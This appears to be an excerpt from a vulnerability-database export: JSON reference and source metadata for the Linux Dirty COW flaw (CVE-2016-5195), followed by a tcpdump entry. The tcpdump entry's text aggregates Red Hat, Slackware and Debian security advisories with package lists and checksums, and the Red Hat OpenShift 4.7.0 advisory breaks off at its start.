        "url": "http://www.openwall.com/lists/oss-security/2016/10/30/1"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139286/dirtycow-linux-kernel-race-condition.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00056.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2127.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2128.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3104-1"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540252/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139287/dirtycow-local-root-proof-of-concept.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3105-2"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139277/kernel-live-patch-security-notice-lsn-0012-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.8.3"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2132.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00051.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/27/13"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2017:0372"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10807"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2107.html"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10176"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00038.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2124.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/2"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/142151/kernel-live-patch-security-notice-lsn-0021-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00039.html"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40616/"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3106-2"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nwmdlbwmgzkfhmrj7quqvcerp5qhdb6w/"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03707en_us"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00049.html"
      },
      {
        "trust": 1.0,
        "url": "https://security.paloaltonetworks.com/cve-2016-5195"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/w3aprvdvpdbxlh4dc5ukzvcr742mjim3/"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20161025-0001/"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540736/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/bid/93793"
      },
      {
        "trust": 1.0,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05352241"
      },
      {
        "trust": 1.0,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1753-security-advisory-0026"
      },
      {
        "trust": 1.0,
        "url": "https://bto.bluecoat.com/security-advisory/sa134"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3105-1"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40847/"
      },
      {
        "trust": 1.0,
        "url": "https://source.android.com/security/bulletin/2016-11-01.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/03/07/1"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00055.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/09/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.debian.org/security/2016/dsa-3696"
      },
      {
        "trust": 1.0,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181107-vcsd"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3104-2"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10222"
      },
      {
        "trust": 1.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/26/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3106-4"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03761en_us"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40839/"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00058.html"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10177"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05347541"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2098.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540736/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/21/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540344/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00034.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/8"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2126.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2110.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/11/03/7"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00033.html"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00052.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139923/linux-kernel-dirty-cow-ptrace_pokedata-privilege-escalation.html"
      },
      {
        "trust": 1.0,
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=1004418"
      },
      {
        "trust": 1.0,
        "url": "http://www.securitytracker.com/id/1037078"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00050.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/15/1"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5195"
      },
      {
        "trust": 0.3,
        "url": "https://github.com/amluto/vulnerabilities/blob/master/others/cve-2016-5195/test_cve-2016-5195.c"
      },
      {
        "trust": 0.3,
        "url": "https://dirtycow.ninja/"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://googlechromereleases.blogspot.in/2016/10/stable-channel-update-for-chrome-os_26.html"
      },
      {
        "trust": 0.3,
        "url": "https://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2147515"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/portal/articles/2613795"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/portal/articles/2613794"
      },
      {
        "trust": 0.3,
        "url": "http://kb.odin.com/en/129683"
      },
      {
        "trust": 0.3,
        "url": "https://github.com/timwr/cve-2016-5195"
      },
      {
        "trust": 0.3,
        "url": "https://forum.proxmox.com/threads/cve-2016-5195-dirty-cow.29908/"
      },
      {
        "trust": 0.3,
        "url": "https://centos.org/forums/viewtopic.php?f=51\u0026p=252514"
      },
      {
        "trust": 0.3,
        "url": "https://www.cloudlinux.com/kernelcare-blog/entry/dirty-cow-vulnerability-the-fix-is-coming"
      },
      {
        "trust": 0.3,
        "url": "https://security-tracker.debian.org/tracker/dla-670-1"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05347541"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05352241"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05341463"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024478"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/73"
      },
      {
        "trust": 0.3,
        "url": "https://coreos.com/blog/cve-2016-5195.html"
      },
      {
        "trust": 0.3,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=9691eac5593ff1e2f82391ad327f21d90322aec1"
      },
      {
        "trust": 0.3,
        "url": "https://gryzli.info/2016/10/21/protect-cve-2016-5195-dirtycow-centos-7rhel7cpanelcloudlinux/"
      },
      {
        "trust": 0.3,
        "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995667"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3104-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3105-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3105-2/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-2/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-3/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-4/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3107-1/"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/en/portal/articles/2613793"
      },
      {
        "trust": 0.3,
        "url": "http://www.vmware.com/security/advisories/vmsa-2016-0018.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.8.0-1017.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-45.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8666"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4470"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4470"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "db": "PACKETSTORM",
        "id": "139277"
      },
      {
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "db": "PACKETSTORM",
        "id": "139334"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "db": "PACKETSTORM",
        "id": "139277"
      },
      {
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "db": "PACKETSTORM",
        "id": "139334"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-11-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "date": "2016-10-19T00:00:00",
        "db": "BID",
        "id": "93793"
      },
      {
        "date": "2016-10-24T21:34:33",
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "date": "2016-10-20T15:36:35",
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "date": "2016-10-20T16:14:03",
        "db": "PACKETSTORM",
        "id": "139277"
      },
      {
        "date": "2016-11-01T14:18:06",
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "date": "2016-10-26T14:02:52",
        "db": "PACKETSTORM",
        "id": "139334"
      },
      {
        "date": "2016-11-10T21:59:00.197000",
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "date": "2017-12-19T22:37:00",
        "db": "BID",
        "id": "93793"
      },
      {
        "date": "2025-11-04T16:15:37.070000",
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "db": "PACKETSTORM",
        "id": "139334"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel CVE-2016-5195 Local Privilege Escalation Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  }
}

VAR-201910-0929

Vulnerability from variot - Updated: 2025-12-17 23:36

lmp_print_data_link_subobjs() in print-lmp.c in tcpdump before 4.9.3 lacks certain bounds checks. tcpdump Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. In addition to persistent storage, Red Hat OpenShift Container Storage provisions a multicloud data management service with an S3 compatible API.

These updated images include numerous security fixes, bug fixes, and enhancements. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1806266 - Require an extension to the cephfs subvolume commands, that can return metadata regarding a subvolume 1813506 - Dockerfile not compatible with docker and buildah 1817438 - OSDs not distributed uniformly across OCS nodes on a 9-node AWS IPI setup 1817850 - [BAREMETAL] rook-ceph-operator does not reconcile when osd deployment is deleted when performed node replacement 1827157 - OSD hitting default CPU limit on AWS i3en.2xlarge instances limiting performance 1829055 - [RFE] add insecureEdgeTerminationPolicy: Redirect to noobaa mgmt route (http to https) 1833153 - add a variable for sleep time of rook operator between checks of downed OSD+Node. 1836299 - NooBaa Operator deploys with HPA that fires maxreplicas alerts by default 1842254 - [NooBaa] Compression stats do not add up when compression id disabled 1845976 - OCS 4.5 Independent mode: must-gather commands fails to collect ceph command outputs from external cluster 1849771 - [RFE] Account created by OBC should have same permissions as bucket owner 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1854500 - [tracker-rhcs bug 1838931] mgr/volumes: add command to return metadata of a subvolume snapshot 1854501 - [Tracker-rhcs bug 1848494 ]pybind/mgr/volumes: Add the ability to keep snapshots of subvolumes independent of the source subvolume 1854503 - [tracker-rhcs-bug 1848503] cephfs: Provide alternatives to increase the total cephfs subvolume snapshot counts to greater than the current 400 across a Cephfs volume 1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS 1858195 - [GSS] registry pod stuck in ContainerCreating due to pvc from cephfs storage class fail to mount 1859183 - PV expansion is failing in retry loop in pre-existing PV after upgrade to OCS 4.5 (i.e. if the PV spec does not contain expansion params) 1859229 - Rook should delete extra MON PVCs in case first reconcile takes too long and rook skips "b" and "c" (spawned from Bug 1840084#c14) 1859478 - OCS 4.6 : Upon deployment, CSI Pods in CLBO with error - flag provided but not defined: -metadatastorage 1860022 - OCS 4.6 Deployment: LBP CSV and pod should not be deployed since ob/obc CRDs are owned from OCS 4.5 onwards 1860034 - OCS 4.6 Deployment in ocs-ci : Toolbox pod in ContainerCreationError due to key admin-secret not found 1860670 - OCS 4.5 Uninstall External: Openshift-storage namespace in Terminating state as CephObjectStoreUser had finalizers remaining 1860848 - Add validation for rgw-pool-prefix in the ceph-external-cluster-details-exporter script 1861780 - [Tracker BZ1866386][IBM s390x] Mount Failed for CEPH while running couple of OCS test cases.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/libpcap-1.9.1-i586-1_slack14.2.txz: Upgraded. patches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz: Upgraded. Fix buffer overflow/overread vulnerabilities and command line argument/local issues. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16808 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14468 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14469 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14470 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14466 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14461 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14462 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14465 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14881 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14464 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14463 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14467 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10103 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10105 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14880 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16451 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14882 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16227 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16229 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16301 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16230 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16452 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16300 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16228 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15166 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15167 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14879 ( Security fix ) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpcap-1.9.1-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/tcpdump-4.9.3-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpcap-1.9.1-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpcap-1.9.1-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/tcpdump-4.9.3-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpcap-1.9.1-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.1.txz

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libpcap-1.9.1-i586-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libpcap-1.9.1-x86_64-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.2.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpcap-1.9.0-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/tcpdump-4.9.2-i586-3.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpcap-1.9.1-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/tcpdump-4.9.3-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 14.0 packages: 0855bcc24c0d39f6ec3c6fa7d956ebf4 libpcap-1.9.1-i486-1_slack14.0.txz 1c53d8ea7923c5947dbbf0eb2dfca2aa tcpdump-4.9.3-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: 080435560c6498ba82e3131d9d7f36e4 libpcap-1.9.1-x86_64-1_slack14.0.txz 3740823881e104943cb15be6870a0e7d tcpdump-4.9.3-x86_64-1_slack14.0.txz

Slackware 14.1 packages: 7f1dffd77993897a3729c1fb3ea5e395 libpcap-1.9.1-i486-1_slack14.1.txz b267563e154bbddab251e8e2c7a11f69 tcpdump-4.9.3-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 1177a6f007a4924c2116d15f8cb92900 libpcap-1.9.1-x86_64-1_slack14.1.txz de9844ab61993927903a91fc05450c8c tcpdump-4.9.3-x86_64-1_slack14.1.txz

Slackware 14.2 packages: 2672c9a84590170ff8f7f2b233af9a38 libpcap-1.9.1-i586-1_slack14.2.txz 578dbf94aa192915243e2d200c557cc5 tcpdump-4.9.3-i586-1_slack14.2.txz

Slackware x86_64 14.2 packages: 16f70962eebe606d3d9668202752bc51 libpcap-1.9.1-x86_64-1_slack14.2.txz 0a4b8400d30a84bc1df774b3537cb4b5 tcpdump-4.9.3-x86_64-1_slack14.2.txz

Slackware -current packages: 8765839c82fc67a8075b9e1c5211776b l/libpcap-1.9.0-i586-1.txz 9de3c38d7c061534d28b5b599ab5d563 n/tcpdump-4.9.2-i586-3.txz

Slackware x86_64 -current packages: cb278799afec0d6e99ce9a126b9e65f3 l/libpcap-1.9.1-x86_64-1.txz 2d14083ccadb447e5af06e0f940fefa5 n/tcpdump-4.9.3-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg libpcap-1.9.1-i586-1_slack14.2.txz tcpdump-4.9.3-i586-1_slack14.2.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. These vulnerabilities might result in denial of service or, potentially, execution of arbitrary code.

For the oldstable distribution (stretch), these problems have been fixed in version 4.9.3-1~deb9u1.

For the stable distribution (buster), these problems have been fixed in version 4.9.3-1~deb10u1.

For the detailed security status of tcpdump please refer to its security tracker page at: https://security-tracker.debian.org/tracker/tcpdump

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl2uIaAACgkQEMKTtsN8 Tjb5ZA/9FxAE0uHVnbXapPaDdrf4JOElV9+iZho4b87YuSXZKch7y/xUtlHMx6Jy 9iYzUd2Cwg0OPRyZii3PjiGSxSrKW9xTYnyfPzI7WdPFWRbeVLw9PKUV9R18fE2u svIuKdeHiJd/MabagWqPffn4ZxgfxlG2Px3xtQhnFchDb7yXAsRUIdWwjIyw1fXR /lRkaehvKkwBHLYtSTnNnMrZyRYNsZBZ6WSeZ5hIFugq9wwWTYXY3vJxR2IUqhq8 veQrHg8DVt58G+GhI7EdmEKB9vJrjtNZBlz8VCiGESxSw/BZjCw2vl20gL2JmV0f 1OA4NaMH7l6Sj2DQDCqHIDN++PGhLkQWUxJHrLV2aqfZ7kn9bxXpX3djUYYjRzpS yaHsAsFOp7zwXkebbvV0dFhjLtst39xRJAEr8dAw6DUmfZqIPazdLv+PGGDpEuuq pcAe6QqrNettT37VCx81PtIQL4BJf1lvTW6VHIwj0MaQ6aFdNImzw/n1ld26ktoV feHER0IM0saIgwj/STOLV1+elNzi9dGdaFArxMRvM/s3fwo8JiYv1qnzfqGtQ6xH 5QwoBwwMZEEkqBvDCTtyFxLgg+Q/iVavwinxIRIb4Ttkr9M+PBL0WldFntlQRrlN SZDCcsvfxjM9aOwNS+tMCoX3CKB7hj94u+ti8MRJCw9I9EOzmZE= =bACv -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Summary:

Red Hat OpenShift Container Platform release 4.7.0 is now available.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.0. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2020:5634

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64

The image digest is sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-s390x

The image digest is sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le

The image digest is sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6

Security Fix(es):

